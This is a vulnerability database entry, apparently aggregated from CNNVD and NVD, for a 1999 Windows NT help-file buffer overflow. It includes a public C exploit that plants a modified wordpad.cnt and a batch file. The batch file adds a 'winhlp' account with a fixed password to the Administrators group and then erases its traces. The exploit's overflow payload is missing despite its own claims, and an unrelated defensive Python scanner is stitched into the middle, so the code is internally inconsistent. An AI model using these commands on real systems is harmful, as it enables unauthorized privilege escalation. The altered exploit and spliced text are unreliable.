Published: 1999-05-17 00:00:00
Revised: 2008-09-09 08:35:15

[Original] Buffer overflow in Windows NT 4.0 help file utility via a malformed help file.

[CNNVD] Windows NT Help File Utility Vulnerability (CNNVD-199905-033)

        A buffer overflow vulnerability exists in Windows NT 4.0. The vulnerability is triggered in the help file utility via a malformed help file.

- CVSS (Base Score)

CVSS score: 4.6 [MEDIUM]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [may degrade performance or interrupt access to resources]
Attack complexity: LOW [no access conditions restrict exploitation]
Attack vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication required]

- CPE (Affected platforms and products)

cpe:/o:microsoft:windows_2000  Microsoft Windows 2000
cpe:/o:microsoft:windows_nt:4.0  Microsoft Windows NT 4.0
cpe:/o:microsoft:windows_nt  Microsoft Windows NT

- OVAL (technical details for detection)


- Official database links
(Official data source) MITRE
(Official data source) NVD
(Official data source) CNNVD

- Other links and resources
(VENDOR_ADVISORY)  MS  MS99-015;%5BLN%5D;Q231605
(UNKNOWN)  MSKB  Q231605

- Vulnerability information

Windows NT Help File Utility Vulnerability
Medium  Buffer overflow
1999-05-17 00:00:00 2005-05-02 00:00:00
        A buffer overflow vulnerability exists in Windows NT 4.0. The vulnerability is triggered in the help file utility via a malformed help file.

- Advisories and patches


- Vulnerability information (19209)

Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 Help File Buffer Overflow Vulnerability (EDBID:19209)
windows local
1999-05-17 Verified
0 David Litchfield
N/A [Download]

Lax permission in the Windows NT help file folder and a buffer overflow in the Help utility may allow malicious users to gain Administrator privileges.

The Windows NT Help utility parses and displays help information for selected applications. The help files are stored in the %SystemRoot%\help directory. The default permissions in this directory allow any user to add new files.

A buffer overflow exists in the Help utility when it attempts to read a .cnt file with an overly long heading string. Content tab information files (".cnt") are generated when rich text format files (".rtf") are translated to help files (".hlp"). If the string is longer than 507 bytes, winhlp32 truncates the entry and the buffer overflow does not occur.

A malicious user can create a custom .cnt help file with executable code in an entry string which, when stored in the help directory and viewed by an unsuspecting user, can grant them that user's privileges.

The vulnerability is not limited by the permissions of the help file directory, as the Help utility will search for a .cnt file first in its execution directory before looking in the help file directory.
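A defender-side check for the condition described above, added here as an example (not part of the advisory or of the original exploit): it parses .cnt contents files and flags heading entries that are unusually long but still under the 507-byte truncation limit, or that carry raw non-printable bytes. The .cnt line layout, the `MAX_HEADING` policy threshold and the sample file are assumptions of this example.

```python
# Headings longer than this are truncated by winhlp32 and do not overflow (per the
# writeup above); the overflow window lies below it, above an internal buffer whose
# exact size the writeup does not give.
TRUNCATION_LIMIT = 507
MAX_HEADING = 128  # policy threshold for a "suspiciously long" heading (assumption)
PRINTABLE = set(range(0x20, 0x7F)) | {0x09}

# Constructed sample .cnt. The layout (":Base"/":Title" directives followed by
# "<level> <heading>[=<topic id>]" entries) is assumed from the WinHelp .cnt
# format; the single entry line written by the exploit above has this shape.
SAMPLE_CNT = (b":Base wordpad.hlp\n"
              b":Title WordPad Help\n"
              b"1 Working with documents\n"
              b"2 Opening a document=WRIPAD_OPEN_DOC\n"
              + b"2 " + b"A" * 300 + b"=WRIPAD_SAVE_DOC\n"  # long, not truncated
              + b"2 Print\x01\x02\xffing=WRIPAD_PRINT\n"    # raw bytes in a heading
              + b"2 " + b"B" * 600 + b"\n")                 # beyond truncation limit

def parse_cnt(data):
    """Yield (lineno, level, heading, topic) for each entry line; directives are skipped."""
    for lineno, raw in enumerate(data.splitlines(), 1):
        if not raw.strip() or raw.startswith(b":"):
            continue
        level, _, rest = raw.partition(b" ")
        if not level.isdigit():
            continue  # not an entry line; do not guess at its meaning
        heading, _, topic = rest.partition(b"=")
        yield lineno, int(level), heading, topic

def scan_cnt(data):
    """Return [(lineno, reason)] for entries worth a closer look."""
    findings = []
    for lineno, _level, heading, _topic in parse_cnt(data):
        n = len(heading)
        if MAX_HEADING < n <= TRUNCATION_LIMIT:
            findings.append((lineno, "%d-byte heading inside the non-truncated window" % n))
        elif n > TRUNCATION_LIMIT:
            findings.append((lineno, "%d-byte heading exceeds winhlp32 truncation limit" % n))
        if any(b not in PRINTABLE for b in heading):
            findings.append((lineno, "non-printable bytes in heading"))
    return findings

def scan_file(path):
    """Scan one .cnt file on disk, e.g. each file under %SystemRoot%\\help."""
    with open(path, "rb") as f:
        return scan_cnt(f.read())
```

Run `scan_file` over every .cnt in the help directory and in application directories; a heading in the flagged window on a file any user could write is what the advisory's fix (tightened permissions plus the patched winhlp32) is meant to stop.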

#include <stdio.h>
#include <windows.h>
#include <string.h>

int main(void)
{
 char eip[5]="\xE5\x27\xF3\x77";  /* return address; unused in this copy of the code */

 FILE *fd;
 printf("* WINHLPADD exploits a buffer overrun in Winhlp32.exe *\n");
 printf("*   This version runs on Service Pack 4 machines and  *\n");
 printf("*       assumes a msvcrt.dll version of 4.00.6201     *\n");
 printf("*                                                     *\n");
 printf("* (C) David Litchfield ( '99 *\n");

 /* check that the real contents file is present and readable */
 fd = fopen("wordpad.cnt", "r");
 if (fd==NULL)
 {
   printf("\n\nWordpad.cnt not found or insufficient rights to access it.\nRun this from the WINNT\\HELP directory");
   return 0;
 }
 fclose(fd);
 printf("\nMaking a copy of real wordpad.cnt - wordpad.sav\n");
 system("copy wordpad.cnt wordpad.sav");
 printf("\n\nCreating wordpad.cnt with exploit code...");
 fd = fopen("wordpad.cnt", "w+");
 if (fd==NULL)
 {
   printf("Failed to open wordpad.cnt in write mode. Check you have sufficent rights\n");
   return 0;
 }

 fprintf(fd,"2 Opening a document=WRIPAD_OPEN_DOC\n");
 fclose(fd);
 printf("\nCreating batch file add.bat\n\n");
 fd = fopen("add.bat", "w");
 if (fd == NULL)
 {
   printf("Couldn't create batch file. Manually create one instead");
   return 0;
 }
 printf("The batch file will attempt to create a user account called \"winhlp\" and\n");
 printf("with a password of \"winhlp!!\" and add it to the Local Administrators group.\n");
 printf("Once this is done it will reset the files and delete itself.\n");
 fprintf(fd,"net user winhlp winhlp!! /add\n");
 fprintf(fd,"net localgroup administrators winhlp /add\n");
 fprintf(fd,"del wordpad.cnt\ncopy wordpad.sav wordpad.cnt\n");
 fprintf(fd,"del wordpad.sav\n");
 fprintf(fd,"del add.bat\n");
 fclose(fd);
 printf("\nBatch file created.");
 printf("\n\nCreated. Now open up Wordpad and click on Help\n");

 return 0;
}

NOTE: The attached exploit code has been compiled to run on Windows NT 4.0 SP4 with msvcrt.dll version 4.20.6201

- Vulnerability information

Microsoft Windows NT Help File Utility Overflow
Local Access Required Input Manipulation
Loss of Integrity Patch / RCS
Exploit Public Vendor Verified

- Vulnerability description

- Timeline

1999-05-18 Unknown
Unknown Unknown

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.

- References

- Vulnerability author

Unknown or Incomplete